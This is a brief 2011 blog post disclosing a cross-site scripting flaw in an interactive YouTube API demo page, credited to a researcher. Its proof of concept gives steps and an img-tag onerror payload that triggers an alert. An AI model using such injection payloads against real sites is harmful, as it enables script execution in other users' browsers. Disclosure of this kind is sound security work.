Thursday, 10 November 2011

XSS Vulnerability in Interactive YouTube API Demo Beta

There is a Critical Cross site XSS Vulnerability in Interactive YouTube API Demo Beta, Discovered by various sources. One of the White Hat Hacker "Vansh Sharma" Inform us about this XSS Vulnerability with proof of concept.
Proof Of Concept :
  • Open http://gdata.youtube.com/
  • Enter script <img src="<img src=search"/onerror=alert("xss")//"> in the keyword area.
  • Press ADD

Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)